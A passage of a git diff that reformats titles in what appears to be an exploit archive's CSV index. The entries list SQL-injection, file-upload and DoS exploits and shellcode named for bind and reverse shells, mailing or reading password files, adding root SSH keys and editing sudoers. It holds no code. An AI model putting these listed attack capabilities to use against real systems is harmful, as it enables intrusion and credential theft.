Handling",2010-04-11,"Daniel Correa",windows,remote,0 12157,platforms/php/webapps/12157.txt,"OnePC mySite Management Software SQL Injection Vulnerability",2010-04-11,Valentin,php,webapps,0 @@ -11506,7 +11506,7 @@ id,file,description,date,author,platform,type,port 12603,platforms/windows/dos/12603.py,"SmallFTPD FTP Server 1.0.3 - DELE Command DoS",2010-05-14,"Jeremiah Talamantes",windows,dos,0 12604,platforms/windows/dos/12604.py,"TYPSoft FTP Server 1.10 - RETR Command DoS",2010-05-14,"Jeremiah Talamantes",windows,dos,0 12605,platforms/windows/dos/12605.html,"IncrediMail (ImShExtU.dll) ActiveX Memory Corruption",2010-05-14,Lincoln,windows,dos,0 -12606,platforms/asp/webapps/12606.txt,"SelfComposer CMS- SQL Injection Vulnerability",2010-05-14,Locu,asp,webapps,0 +12606,platforms/asp/webapps/12606.txt,"SelfComposer CMS - SQL Injection Vulnerability",2010-05-14,Locu,asp,webapps,0 12607,platforms/php/webapps/12607.txt,"Joomla Component com_jequoteform - Local File Inclusion",2010-05-14,"ALTBTA ",php,webapps,0 12608,platforms/php/webapps/12608.txt,"Heaven Soft CMS 4.7 - (photogallery_open.php) SQL Injection Vulnerability",2010-05-14,CoBRa_21,php,webapps,0 12609,platforms/php/webapps/12609.txt,"Alibaba Clone Platinum (buyer/index.php) SQL Injection Vulnerability",2010-05-14,GuN,php,webapps,0 @@ -11563,7 +11563,7 @@ id,file,description,date,author,platform,type,port 12667,platforms/php/webapps/12667.py,"SQL Injection Entry Level Content Management System (EL CMS)",2010-05-20,"vir0e5 ",php,webapps,0 12671,platforms/php/webapps/12671.txt,"Powder Blue Design SQL Injection Vulnerability",2010-05-20,cyberlog,php,webapps,0 12672,platforms/asp/webapps/12672.txt,"Spaw Editor 1.0 & 2.0 - Remote File Upload",2010-05-20,Ma3sTr0-Dz,asp,webapps,0 -12673,platforms/windows/remote/12673.txt,"ComponentOne VSFlexGrid 7 & 8 - ""Archive()"" method Remote Buffer Overflow Exploit",2010-05-20,Ma3sTr0-Dz,windows,remote,0 +12673,platforms/windows/remote/12673.txt,"ComponentOne VSFlexGrid 7 & 8 - _Archive()_ method Remote Buffer Overflow Exploit",2010-05-20,Ma3sTr0-Dz,windows,remote,0 12674,platforms/php/webapps/12674.txt,"webYourPhotos <= 6.05 - (index.php) Remote File Inclusion Vulnerability",2010-05-20,"Sn!pEr.S!Te Hacker",php,webapps,0 30093,platforms/linux/local/30093.txt,"Mutt 1.4.2 Mutt_Gecos_Name Function Local Buffer Overflow Vulnerability",2007-05-28,raylai,linux,local,0 14341,platforms/php/webapps/14341.html,"Campsite CMS 3.4.0 - Multiple CSRF Vulnerabilities",2010-07-12,10n1z3d,php,webapps,0 @@ -11593,7 +11593,7 @@ id,file,description,date,author,platform,type,port 12695,platforms/php/webapps/12695.txt,"Azimut Technologie Admin Login Bypass Vulnerability",2010-05-22,Ra3cH,php,webapps,0 12696,platforms/php/webapps/12696.txt,"E-commerce Group (cat.php) SQL Injection Vulnerability",2010-05-22,"BLack Revenge",php,webapps,0 12697,platforms/php/webapps/12697.php,"hustoj (fckeditor) Remote Arbitrary File Upload Exploit",2010-05-22,eidelweiss,php,webapps,0 -12698,platforms/windows/dos/12698.py,"Open&Compact Ftp Server 1.2 - ""PORT"" command Remote DoS",2010-05-22,Ma3sTr0-Dz,windows,dos,0 +12698,platforms/windows/dos/12698.py,"Open&Compact Ftp Server 1.2 - _PORT_ command Remote DoS",2010-05-22,Ma3sTr0-Dz,windows,dos,0 12699,platforms/php/webapps/12699.txt,"eWebEditor 1.x - (WYSIWYG) Remote File Upload",2010-05-22,Ma3sTr0-Dz,php,webapps,0 12700,platforms/asp/webapps/12700.txt,"DotNetNuke Remote File upload Vulnerability",2010-05-22,"Ra3cH and Ma3sTr0-Dz",asp,webapps,0 12701,platforms/asp/webapps/12701.txt,"Rave Creations/UHM (artists.asp) SQL Injection Vulnerability",2010-05-22,Ra3cH,asp,webapps,0 @@ -11686,7 +11686,7 @@ id,file,description,date,author,platform,type,port 12809,platforms/php/webapps/12809.txt,"Symphony CMS Local File Inclusion Vulnerability",2010-05-30,AntiSecurity,php,webapps,0 12811,platforms/php/webapps/12811.txt,"Oscommerce Online Merchant 2.2 - Remote File Upload",2010-05-30,MasterGipy,php,webapps,0 12812,platforms/php/webapps/12812.txt,"Joomla com_quran SQL Injection Vulnerability",2010-05-30,r3m1ck,php,webapps,0 -12813,platforms/php/webapps/12813.txt,"WsCMS SQL Injection Vulnerability [ Multiple Vulnerabilities ]",2010-05-31,cyberlog,php,webapps,0 +12813,platforms/php/webapps/12813.txt,"WsCMS SQL Injection Vulnerability - Multiple Vulnerabilities",2010-05-31,cyberlog,php,webapps,0 12814,platforms/php/webapps/12814.txt,"Joomla Component com_g2bridge LFI Vulnerability",2010-05-31,akatsuchi,php,webapps,0 12815,platforms/windows/remote/12815.txt,"GoAheaad Webserver Source Code Disclosure Vulnerability",2010-05-30,Sil3nt_Dre4m,windows,remote,0 12816,platforms/windows/dos/12816.py,"ZipExplorer 7.0 - (.zar) DoS",2010-05-31,TecR0c,windows,dos,0 @@ -11720,46 +11720,46 @@ id,file,description,date,author,platform,type,port 12866,platforms/php/webapps/12866.txt,"K9 Kreativity Design (pages.php) SQL Injection Vulnerability",2010-06-03,Newbie_Campuz,php,webapps,0 12867,platforms/php/webapps/12867.txt,"clickartweb Design SQL Injection Vulnerability",2010-06-03,cyberlog,php,webapps,0 12868,platforms/php/webapps/12868.txt,"Joomla Component com_lead SQL Injection",2010-06-03,ByEge,php,webapps,0 -13241,platforms/aix/shellcode/13241.txt,"Aix execve /bin/sh 88 bytes",2004-09-26,"Georgi Guninski",aix,shellcode,0 +13241,platforms/aix/shellcode/13241.txt,"Aix - execve /bin/sh (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0 13242,platforms/bsd/shellcode/13242.txt,"BSD Passive Connection Shellcode",2000-11-19,Scrippie,bsd,shellcode,0 -13243,platforms/bsd_ppc/shellcode/13243.c,"bsd/PPC execve /bin/sh 128 bytes",2004-09-26,Palante,bsd_ppc,shellcode,0 -13244,platforms/bsd_x86/shellcode/13244.c,"bsd/x86 setuid/execve shellcode 30 bytes",2006-07-20,"Marco Ivaldi",bsd_x86,shellcode,0 -13245,platforms/bsd_x86/shellcode/13245.c,"bsd/x86 setuid/portbind shellcode 94 bytes",2006-07-20,"Marco Ivaldi",bsd_x86,shellcode,0 -13246,platforms/bsd_x86/shellcode/13246.c,"bsd/x86 execve /bin/sh multiplatform 27 bytes",2004-09-26,n0gada,bsd_x86,shellcode,0 -13247,platforms/bsd_x86/shellcode/13247.c,"bsd/x86 execve /bin/sh setuid (0) 29 bytes",2004-09-26,"Matias Sedalo",bsd_x86,shellcode,0 -13248,platforms/bsd_x86/shellcode/13248.c,"bsd/x86 portbind port 31337 83 bytes",2004-09-26,no1,bsd_x86,shellcode,0 -13249,platforms/bsd_x86/shellcode/13249.c,"bsd/x86 portbind port random 143 bytes",2004-09-26,MayheM,bsd_x86,shellcode,0 -13250,platforms/bsd_x86/shellcode/13250.c,"bsd/x86 break chroot 45 bytes",2004-09-26,"Matias Sedalo",bsd_x86,shellcode,0 -13251,platforms/bsd_x86/shellcode/13251.c,"bsd/x86 execve /bin/sh Crypt /bin/sh 49 bytes",2004-09-26,dev0id,bsd_x86,shellcode,0 -13252,platforms/bsd_x86/shellcode/13252.c,"bsd/x86 execve /bin/sh ENCRYPT* 57 bytes",2004-09-26,"Matias Sedalo",bsd_x86,shellcode,0 -13254,platforms/bsd_x86/shellcode/13254.c,"bsd/x86 connect 93 bytes",2004-09-26,dev0id,bsd_x86,shellcode,0 -13255,platforms/bsd_x86/shellcode/13255.c,"bsd/x86 cat /etc/master.passwd | mail [email] 92 bytes",2004-09-26,"Matias Sedalo",bsd_x86,shellcode,0 -13256,platforms/bsd_x86/shellcode/13256.c,"bsd/x86 reverse portbind 129 bytes",2004-09-26,"Sinan Eren",bsd_x86,shellcode,0 -13257,platforms/bsdi_x86/shellcode/13257.txt,"bsdi/x86 execve /bin/sh 45 bytes",2004-09-26,duke,bsdi_x86,shellcode,0 -13258,platforms/bsdi_x86/shellcode/13258.txt,"bsdi/x86 execve /bin/sh 46 bytes",2004-09-26,vade79,bsdi_x86,shellcode,0 +13243,platforms/bsd_ppc/shellcode/13243.c,"bsd/PPC - execve /bin/sh (128 bytes)",2004-09-26,Palante,bsd_ppc,shellcode,0 +13244,platforms/bsd_x86/shellcode/13244.c,"bsd/x86 - setuid/execve shellcode (30 bytes)",2006-07-20,"Marco Ivaldi",bsd_x86,shellcode,0 +13245,platforms/bsd_x86/shellcode/13245.c,"bsd/x86 - setuid/portbind shellcode (94 bytes)",2006-07-20,"Marco Ivaldi",bsd_x86,shellcode,0 +13246,platforms/bsd_x86/shellcode/13246.c,"bsd/x86 - execve /bin/sh multiplatform (27 bytes)",2004-09-26,n0gada,bsd_x86,shellcode,0 +13247,platforms/bsd_x86/shellcode/13247.c,"bsd/x86 - execve /bin/sh setuid (0) (29 bytes)",2004-09-26,"Matias Sedalo",bsd_x86,shellcode,0 +13248,platforms/bsd_x86/shellcode/13248.c,"bsd/x86 - portbind port 31337 (83 bytes)",2004-09-26,no1,bsd_x86,shellcode,0 +13249,platforms/bsd_x86/shellcode/13249.c,"bsd/x86 - portbind port random (143 bytes)",2004-09-26,MayheM,bsd_x86,shellcode,0 +13250,platforms/bsd_x86/shellcode/13250.c,"bsd/x86 - break chroot (45 bytes)",2004-09-26,"Matias Sedalo",bsd_x86,shellcode,0 +13251,platforms/bsd_x86/shellcode/13251.c,"bsd/x86 - execve /bin/sh Crypt /bin/sh (49 bytes)",2004-09-26,dev0id,bsd_x86,shellcode,0 +13252,platforms/bsd_x86/shellcode/13252.c,"bsd/x86 - execve /bin/sh ENCRYPT* (57 bytes)",2004-09-26,"Matias Sedalo",bsd_x86,shellcode,0 +13254,platforms/bsd_x86/shellcode/13254.c,"bsd/x86 - connect (93 bytes)",2004-09-26,dev0id,bsd_x86,shellcode,0 +13255,platforms/bsd_x86/shellcode/13255.c,"bsd/x86 - cat /etc/master.passwd | mail [email] (92 bytes)",2004-09-26,"Matias Sedalo",bsd_x86,shellcode,0 +13256,platforms/bsd_x86/shellcode/13256.c,"bsd/x86 - reverse portbind (129 bytes)",2004-09-26,"Sinan Eren",bsd_x86,shellcode,0 +13257,platforms/bsdi_x86/shellcode/13257.txt,"bsdi/x86 - execve /bin/sh (45 bytes)",2004-09-26,duke,bsdi_x86,shellcode,0 +13258,platforms/bsdi_x86/shellcode/13258.txt,"bsdi/x86 - execve /bin/sh (46 bytes)",2004-09-26,vade79,bsdi_x86,shellcode,0 30245,platforms/ios/webapps/30245.txt,"Phone Drive Eightythree 4.1.1 iOS - Multiple Vulnerabilities",2013-12-12,Vulnerability-Lab,ios,webapps,0 30170,platforms/php/webapps/30170.txt,"Beehive Forum 0.7.1 Links.PHP Multiple Cross-Site Scripting Vulnerabilities",2007-06-11,"Ory Segal",php,webapps,0 -13260,platforms/bsdi_x86/shellcode/13260.c,"bsdi/x86 execve /bin/sh toupper evasion 97 bytes",2004-09-26,N/A,bsdi_x86,shellcode,0 +13260,platforms/bsdi_x86/shellcode/13260.c,"bsdi/x86 - execve /bin/sh toupper evasion (97 bytes)",2004-09-26,N/A,bsdi_x86,shellcode,0 13261,platforms/freebsd_x86/shellcode/13261.txt,"FreeBSD i386/AMD64 Execve /bin/sh - Anti-Debugging",2009-04-13,c0d3_z3r0,freebsd_x86,shellcode,0 -13262,platforms/freebsd_x86/shellcode/13262.txt,"freebsd/x86 setreuid_ execve(pfctl -d) (56 bytes)",2008-09-12,suN8Hclf,freebsd_x86,shellcode,0 -13263,platforms/freebsd_x86/shellcode/13263.txt,"freebsd/x86 connect back.send.exit /etc/passwd 112 bytes",2008-09-10,suN8Hclf,freebsd_x86,shellcode,0 -13264,platforms/freebsd_x86/shellcode/13264.txt,"freebsd/x86 kill all processes 12 bytes",2008-09-09,suN8Hclf,freebsd_x86,shellcode,0 +13262,platforms/freebsd_x86/shellcode/13262.txt,"freebsd/x86 - setreuid_ execve(pfctl -d) (56 bytes)",2008-09-12,suN8Hclf,freebsd_x86,shellcode,0 +13263,platforms/freebsd_x86/shellcode/13263.txt,"freebsd/x86- connect back.send.exit /etc/passwd (112 bytes)",2008-09-10,suN8Hclf,freebsd_x86,shellcode,0 +13264,platforms/freebsd_x86/shellcode/13264.txt,"freebsd/x86 - kill all processes (12 bytes)",2008-09-09,suN8Hclf,freebsd_x86,shellcode,0 13265,platforms/freebsd_x86/shellcode/13265.c,"freebsd/x86 rev connect_ recv_ jmp_ return results (90 bytes)",2008-09-05,sm4x,freebsd_x86,shellcode,0 -13266,platforms/freebsd_x86/shellcode/13266.asm,"freebsd/x86 /bin/cat /etc/master.passwd (NULL free) 65 bytes",2008-08-25,sm4x,freebsd_x86,shellcode,0 -13267,platforms/freebsd_x86/shellcode/13267.asm,"freebsd/x86 reverse portbind /bin/sh 89 bytes",2008-08-21,sm4x,freebsd_x86,shellcode,0 -13268,platforms/freebsd_x86/shellcode/13268.asm,"freebsd/x86 setuid(0); execve(ipf -Fa); shellcode 57 bytes",2008-08-21,sm4x,freebsd_x86,shellcode,0 -13269,platforms/freebsd_x86/shellcode/13269.c,"freebsd/x86 encrypted shellcode /bin/sh 48 bytes",2008-08-19,c0d3_z3r0,freebsd_x86,shellcode,0 +13266,platforms/freebsd_x86/shellcode/13266.asm,"freebsd/x86 - /bin/cat /etc/master.passwd (NULL free) (65 bytes)",2008-08-25,sm4x,freebsd_x86,shellcode,0 +13267,platforms/freebsd_x86/shellcode/13267.asm,"freebsd/x86 - reverse portbind /bin/sh (89 bytes)",2008-08-21,sm4x,freebsd_x86,shellcode,0 +13268,platforms/freebsd_x86/shellcode/13268.asm,"freebsd/x86 - setuid(0); execve(ipf -Fa); shellcode (57 bytes)",2008-08-21,sm4x,freebsd_x86,shellcode,0 +13269,platforms/freebsd_x86/shellcode/13269.c,"freebsd/x86 - encrypted shellcode /bin/sh (48 bytes)",2008-08-19,c0d3_z3r0,freebsd_x86,shellcode,0 13270,platforms/freebsd_x86/shellcode/13270.c,"freebsd/x86 portbind 4883 with auth shellcode",2006-07-19,MahDelin,freebsd_x86,shellcode,0 -13271,platforms/freebsd_x86/shellcode/13271.c,"freebsd/x86 reboot(RB_AUTOBOOT) Shellcode 7 bytes",2006-04-19,IZ,freebsd_x86,shellcode,0 -13272,platforms/freebsd_x86/shellcode/13272.c,"freebsd/x86 execve /bin/sh 23 bytes",2006-04-14,IZ,freebsd_x86,shellcode,0 +13271,platforms/freebsd_x86/shellcode/13271.c,"freebsd/x86 - reboot(RB_AUTOBOOT) Shellcode (7 bytes)",2006-04-19,IZ,freebsd_x86,shellcode,0 +13272,platforms/freebsd_x86/shellcode/13272.c,"freebsd/x86 - execve /bin/sh (23 bytes)",2006-04-14,IZ,freebsd_x86,shellcode,0 13273,platforms/freebsd_x86/shellcode/13273.c,"freebsd/x86 execve /bin/sh 23 bytes (2)",2004-09-26,marcetam,freebsd_x86,shellcode,0 -13274,platforms/freebsd_x86/shellcode/13274.c,"freebsd/x86 execve /bin/sh 37 bytes",2004-09-26,preedator,freebsd_x86,shellcode,0 -13275,platforms/freebsd_x86/shellcode/13275.c,"freebsd/x86 kldload /tmp/o.o 74 bytes",2004-09-26,dev0id,freebsd_x86,shellcode,0 +13274,platforms/freebsd_x86/shellcode/13274.c,"freebsd/x86 - execve /bin/sh (37 bytes)",2004-09-26,preedator,freebsd_x86,shellcode,0 +13275,platforms/freebsd_x86/shellcode/13275.c,"freebsd/x86 - kldload /tmp/o.o (74 bytes)",2004-09-26,dev0id,freebsd_x86,shellcode,0 13276,platforms/freebsd_x86/shellcode/13276.c,"freebsd/x86 chown 0:0 _ chmod 6755 & execve /tmp/sh (44 bytes)",2004-09-26,"Claes Nyberg",freebsd_x86,shellcode,0 -13277,platforms/freebsd_x86/shellcode/13277.c,"freebsd/x86 execve /tmp/sh 34 bytes",2004-09-26,"Claes Nyberg",freebsd_x86,shellcode,0 -13278,platforms/freebsd_x86/shellcode/13278.asm,"freebsd/x86 connect 102 bytes",2004-09-26,Scrippie,freebsd_x86,shellcode,0 -13279,platforms/freebsd_x86-64/shellcode/13279.c,"freebsd/x86-64 exec(""/bin/sh"") shellcode 31 bytes",2009-05-18,"Hack'n Roll",freebsd_x86-64,shellcode,0 -13280,platforms/freebsd_x86-64/shellcode/13280.c,"freebsd/x86-64 execve /bin/sh shellcode 34 bytes",2009-05-15,c0d3_z3r0,freebsd_x86-64,shellcode,0 +13277,platforms/freebsd_x86/shellcode/13277.c,"freebsd/x86 - execve /tmp/sh (34 bytes)",2004-09-26,"Claes Nyberg",freebsd_x86,shellcode,0 +13278,platforms/freebsd_x86/shellcode/13278.asm,"freebsd/x86 - connect (102 bytes)",2004-09-26,Scrippie,freebsd_x86,shellcode,0 +13279,platforms/freebsd_x86-64/shellcode/13279.c,"freebsd/x86-64 - exec(_/bin/sh_) shellcode (31 bytes)",2009-05-18,"Hack'n Roll",freebsd_x86-64,shellcode,0 +13280,platforms/freebsd_x86-64/shellcode/13280.c,"freebsd/x86-64 - execve /bin/sh shellcode (34 bytes)",2009-05-15,c0d3_z3r0,freebsd_x86-64,shellcode,0 13281,platforms/generator/shellcode/13281.c,"linux/x86 execve shellcode generator null byte free",2009-06-29,certaindeath,generator,shellcode,0 13282,platforms/generator/shellcode/13282.php,"linux/x86 generate portbind payload",2009-06-09,"Jonathan Salwan",generator,shellcode,0 13283,platforms/generator/shellcode/13283.php,"windows xp/sp1 generate portbind payload",2009-06-09,"Jonathan Salwan",generator,shellcode,0 @@ -11773,96 +11773,96 @@ id,file,description,date,author,platform,type,port 13292,platforms/hardware/shellcode/13292.txt,"Cisco IOS Bind Shellcode 1.0",2008-08-13,"Gyan Chawdhary",hardware,shellcode,0 13293,platforms/hardware/shellcode/13293.txt,"Cisco IOS Tiny Shellcode 1.0",2008-08-13,"Gyan Chawdhary",hardware,shellcode,0 13294,platforms/hardware/shellcode/13294.txt,"Cisco IOS Shellcode And Exploitation Techniques (BlackHat)",2005-08-01,"Michael Lynn",hardware,shellcode,0 -13295,platforms/hp-ux/shellcode/13295.txt,"HPUX execve /bin/sh 58 bytes",2004-09-26,K2,hp-ux,shellcode,0 -13296,platforms/lin_amd64/shellcode/13296.c,"linux/amd64 flush iptables rules shellcode 84 bytes",2008-11-28,gat3way,lin_amd64,shellcode,0 -13297,platforms/lin_amd64/shellcode/13297.c,"linux/amd64 connect-back semi-stealth shellcode 88+ bytes",2006-04-21,phar,lin_amd64,shellcode,0 -13298,platforms/linux_mips/shellcode/13298.c,"linux/mips (Linksys WRT54G/GL) port bind shellcode 276 bytes",2008-08-18,vaicebine,linux_mips,shellcode,0 -13299,platforms/linux_mips/shellcode/13299.c,"linux/mips (Linksys WRT54G/GL) execve shellcode 60 bytes",2008-08-18,vaicebine,linux_mips,shellcode,0 -13300,platforms/linux_mips/shellcode/13300.c,"linux/mips execve /bin/sh 56 bytes",2005-11-09,"Charles Stevenson",linux_mips,shellcode,0 -13301,platforms/linux_ppc/shellcode/13301.c,"linux/ppc execve /bin/sh 60 bytes",2005-11-09,"Charles Stevenson",linux_ppc,shellcode,0 -13302,platforms/linux_ppc/shellcode/13302.c,"linux/ppc read & exec shellcode 32 bytes",2005-11-09,"Charles Stevenson",linux_ppc,shellcode,0 -13303,platforms/linux_ppc/shellcode/13303.c,"linux/ppc connect back execve /bin/sh 240 bytes",2005-11-09,"Charles Stevenson",linux_ppc,shellcode,0 -13304,platforms/linux_ppc/shellcode/13304.c,"linux/ppc execve /bin/sh 112 bytes",2004-09-12,Palante,linux_ppc,shellcode,0 -13305,platforms/linux_sparc/shellcode/13305.c,"linux/SPARC connect back 216 bytes",2004-09-26,killah,linux_sparc,shellcode,0 -13306,platforms/linux_sparc/shellcode/13306.c,"linux/SPARC portbind port 8975 284 bytes",2004-09-12,killah,linux_sparc,shellcode,0 -13307,platforms/lin_x86/shellcode/13307.c,"linux/x86 Self-modifying shellcode for IDS evasion 64 bytes",2009-09-15,XenoMuta,lin_x86,shellcode,0 -13308,platforms/lin_x86/shellcode/13308.c,"linux/x86 shellcode that forks a HTTP Server on port tcp/8800 166 bytes",2009-09-15,XenoMuta,lin_x86,shellcode,0 +13295,platforms/hp-ux/shellcode/13295.txt,"HPUX - execve /bin/sh (58 bytes)",2004-09-26,K2,hp-ux,shellcode,0 +13296,platforms/lin_amd64/shellcode/13296.c,"linux/amd64 - flush iptables rules shellcode (84 bytes)",2008-11-28,gat3way,lin_amd64,shellcode,0 +13297,platforms/lin_amd64/shellcode/13297.c,"linux/amd64 - connect-back semi-stealth shellcode (88+ bytes)",2006-04-21,phar,lin_amd64,shellcode,0 +13298,platforms/linux_mips/shellcode/13298.c,"linux/mips - (Linksys WRT54G/GL) port bind shellcode (276 bytes)",2008-08-18,vaicebine,linux_mips,shellcode,0 +13299,platforms/linux_mips/shellcode/13299.c,"linux/mips - (Linksys WRT54G/GL) execve shellcode (60 bytes)",2008-08-18,vaicebine,linux_mips,shellcode,0 +13300,platforms/linux_mips/shellcode/13300.c,"linux/mips - execve /bin/sh (56 bytes)",2005-11-09,"Charles Stevenson",linux_mips,shellcode,0 +13301,platforms/linux_ppc/shellcode/13301.c,"linux/ppc - execve /bin/sh (60 bytes)",2005-11-09,"Charles Stevenson",linux_ppc,shellcode,0 +13302,platforms/linux_ppc/shellcode/13302.c,"linux/ppc - read & exec shellcode (32 bytes)",2005-11-09,"Charles Stevenson",linux_ppc,shellcode,0 +13303,platforms/linux_ppc/shellcode/13303.c,"linux/ppc - connect back execve /bin/sh (240 bytes)",2005-11-09,"Charles Stevenson",linux_ppc,shellcode,0 +13304,platforms/linux_ppc/shellcode/13304.c,"linux/ppc - execve /bin/sh (112 bytes)",2004-09-12,Palante,linux_ppc,shellcode,0 +13305,platforms/linux_sparc/shellcode/13305.c,"linux/SPARC - connect back (216 bytes)",2004-09-26,killah,linux_sparc,shellcode,0 +13306,platforms/linux_sparc/shellcode/13306.c,"linux/SPARC - portbind port 8975 (284 bytes)",2004-09-12,killah,linux_sparc,shellcode,0 +13307,platforms/lin_x86/shellcode/13307.c,"linux/x86 - Self-modifying shellcode for IDS evasion (64 bytes)",2009-09-15,XenoMuta,lin_x86,shellcode,0 +13308,platforms/lin_x86/shellcode/13308.c,"linux/x86 - shellcode that forks a HTTP Server on port tcp/8800 (166 bytes)",2009-09-15,XenoMuta,lin_x86,shellcode,0 13309,platforms/lin_x86/shellcode/13309.asm,"linux/x86 listens for shellcode on tcp/5555 and jumps to it",2009-09-09,XenoMuta,lin_x86,shellcode,0 -13310,platforms/lin_x86/shellcode/13310.c,"linux/x86 Polymorphic shellcode disable Network Card 75 bytes",2009-08-26,"Jonathan Salwan",lin_x86,shellcode,0 -13311,platforms/lin_x86/shellcode/13311.c,"linux/x86 killall5 polymorphic shellcode 61 bytes",2009-08-11,"Jonathan Salwan",lin_x86,shellcode,0 -13312,platforms/lin_x86/shellcode/13312.c,"linux/x86 /bin/sh polymorphic shellcode 48 bytes",2009-08-11,"Jonathan Salwan",lin_x86,shellcode,0 -13313,platforms/lin_x86/shellcode/13313.c,"Linux/x86 Port Binding Shellcode (xor-encoded) 152 bytes",2009-07-10,Rick,lin_x86,shellcode,0 -13314,platforms/lin_x86/shellcode/13314.c,"linux/x86 reboot() polymorphic shellcode 57 bytes",2009-06-29,"Jonathan Salwan",lin_x86,shellcode,0 -13315,platforms/lin_x86/shellcode/13315.c,"linux/x86 Shellcode Polymorphic chmod(""/etc/shadow""_666) (54 bytes)",2009-06-22,"Jonathan Salwan",lin_x86,shellcode,0 -13316,platforms/lin_x86/shellcode/13316.c,"linux/x86 setreuid(geteuid()_geteuid())_execve(""/bin/sh""_0_0) (34 bytes)",2009-06-16,blue9057,lin_x86,shellcode,0 -13317,platforms/lin_x86/shellcode/13317.s,"linux/x86 bindport 8000 & execve iptables -F 176 bytes",2009-06-08,"Jonathan Salwan",lin_x86,shellcode,0 -13318,platforms/lin_x86/shellcode/13318.s,"linux/x86 bindport 8000 & add user with root access 225+ bytes",2009-06-08,"Jonathan Salwan",lin_x86,shellcode,0 +13310,platforms/lin_x86/shellcode/13310.c,"linux/x86 - Polymorphic shellcode disable Network Card (75 bytes)",2009-08-26,"Jonathan Salwan",lin_x86,shellcode,0 +13311,platforms/lin_x86/shellcode/13311.c,"linux/x86 - killall5 polymorphic shellcode (61 bytes)",2009-08-11,"Jonathan Salwan",lin_x86,shellcode,0 +13312,platforms/lin_x86/shellcode/13312.c,"linux/x86 - /bin/sh polymorphic shellcode (48 bytes)",2009-08-11,"Jonathan Salwan",lin_x86,shellcode,0 +13313,platforms/lin_x86/shellcode/13313.c,"Linux/x86 - Port Binding Shellcode (xor-encoded) (152 bytes)",2009-07-10,Rick,lin_x86,shellcode,0 +13314,platforms/lin_x86/shellcode/13314.c,"linux/x86 - reboot() polymorphic shellcode (57 bytes)",2009-06-29,"Jonathan Salwan",lin_x86,shellcode,0 +13315,platforms/lin_x86/shellcode/13315.c,"linux/x86 Shellcode Polymorphic chmod(_/etc/shadow__666) (54 bytes)",2009-06-22,"Jonathan Salwan",lin_x86,shellcode,0 +13316,platforms/lin_x86/shellcode/13316.c,"linux/x86 setreuid(geteuid()_geteuid())_execve(_/bin/sh__0_0) (34 bytes)",2009-06-16,blue9057,lin_x86,shellcode,0 +13317,platforms/lin_x86/shellcode/13317.s,"linux/x86 - bindport 8000 & execve iptables -F (176 bytes)",2009-06-08,"Jonathan Salwan",lin_x86,shellcode,0 +13318,platforms/lin_x86/shellcode/13318.s,"linux/x86 - bindport 8000 & add user with root access (225+ bytes)",2009-06-08,"Jonathan Salwan",lin_x86,shellcode,0 13319,platforms/lin_x86/shellcode/13319.s,"linux/x86 Bind ASM Code Linux 179 bytes.",2009-06-01,"Jonathan Salwan",lin_x86,shellcode,0 -13320,platforms/lin_x86/shellcode/13320.c,"linux/x86-64 setuid(0) + execve(/bin/sh) 49 bytes",2009-05-14,evil.xi4oyu,lin_x86,shellcode,0 +13320,platforms/lin_x86/shellcode/13320.c,"linux/x86-64 - setuid(0) + execve(/bin/sh) (49 bytes)",2009-05-14,evil.xi4oyu,lin_x86,shellcode,0 13321,platforms/lin_x86/shellcode/13321.c,"Serial port shell binding & busybox Launching shellcode",2009-04-30,phar,lin_x86,shellcode,0 -13322,platforms/lin_x86/shellcode/13322.c,"linux/x86 File unlinker 18 bytes + file path length",2009-03-03,darkjoker,lin_x86,shellcode,0 -13323,platforms/lin_x86/shellcode/13323.c,"linux/x86 Perl script execution 99 bytes + script length",2009-03-03,darkjoker,lin_x86,shellcode,0 -13324,platforms/lin_x86/shellcode/13324.c,"linux/x86 file reader 65 bytes + pathname",2009-02-27,certaindeath,lin_x86,shellcode,0 -13325,platforms/lin_x86/shellcode/13325.c,"linux/x86 chmod(""/etc/shadow""_666) & exit(0) (30 bytes)",2009-02-20,"Jonathan Salwan",lin_x86,shellcode,0 -13326,platforms/lin_x86/shellcode/13326.c,"linux/x86 killall5 shellcode 34 bytes",2009-02-04,"Jonathan Salwan",lin_x86,shellcode,0 +13322,platforms/lin_x86/shellcode/13322.c,"linux/x86 File unlinker (18 bytes + file path length)",2009-03-03,darkjoker,lin_x86,shellcode,0 +13323,platforms/lin_x86/shellcode/13323.c,"linux/x86 Perl script execution (99 bytes + script length)",2009-03-03,darkjoker,lin_x86,shellcode,0 +13324,platforms/lin_x86/shellcode/13324.c,"linux/x86 file reader (65 bytes + pathname)",2009-02-27,certaindeath,lin_x86,shellcode,0 +13325,platforms/lin_x86/shellcode/13325.c,"linux/x86 chmod(_/etc/shadow__666) & exit(0) (30 bytes)",2009-02-20,"Jonathan Salwan",lin_x86,shellcode,0 +13326,platforms/lin_x86/shellcode/13326.c,"linux/x86 - killall5 shellcode (34 bytes)",2009-02-04,"Jonathan Salwan",lin_x86,shellcode,0 13327,platforms/lin_x86/shellcode/13327.c,"linux/x86 PUSH reboot() - 30 bytes",2009-01-16,"Jonathan Salwan",lin_x86,shellcode,0 13328,platforms/lin_x86/shellcode/13328.c,"linux x86 shellcode obfuscator",2008-12-09,sm4x,lin_x86,shellcode,0 -13329,platforms/lin_x86/shellcode/13329.c,"linux/x86 connect-back port UDP/54321 live packet capture 151 bytes",2008-11-23,XenoMuta,lin_x86,shellcode,0 -13330,platforms/lin_x86/shellcode/13330.c,"linux/x86 append rsa key to /root/.ssh/authorized_keys2 295 bytes",2008-11-23,XenoMuta,lin_x86,shellcode,0 -13331,platforms/lin_x86/shellcode/13331.c,"linux/x86 edit /etc/sudoers for full access 86 bytes",2008-11-19,Rick,lin_x86,shellcode,0 -13332,platforms/lin_x86/shellcode/13332.c,"Ho' Detector (Promiscuous mode detector shellcode) 56 bytes",2008-11-18,XenoMuta,lin_x86,shellcode,0 +13329,platforms/lin_x86/shellcode/13329.c,"linux/x86 - connect-back port UDP/54321 live packet capture (151 bytes)",2008-11-23,XenoMuta,lin_x86,shellcode,0 +13330,platforms/lin_x86/shellcode/13330.c,"linux/x86 - append rsa key to /root/.ssh/authorized_keys2 (295 bytes)",2008-11-23,XenoMuta,lin_x86,shellcode,0 +13331,platforms/lin_x86/shellcode/13331.c,"linux/x86 - edit /etc/sudoers for full access (86 bytes)",2008-11-19,Rick,lin_x86,shellcode,0 +13332,platforms/lin_x86/shellcode/13332.c,"Ho' Detector (Promiscuous mode detector shellcode) (56 bytes)",2008-11-18,XenoMuta,lin_x86,shellcode,0 13333,platforms/lin_x86/shellcode/13333.txt,"linux/x86 setuid(0) & execve(/bin/sh_0_0) shellcode (28 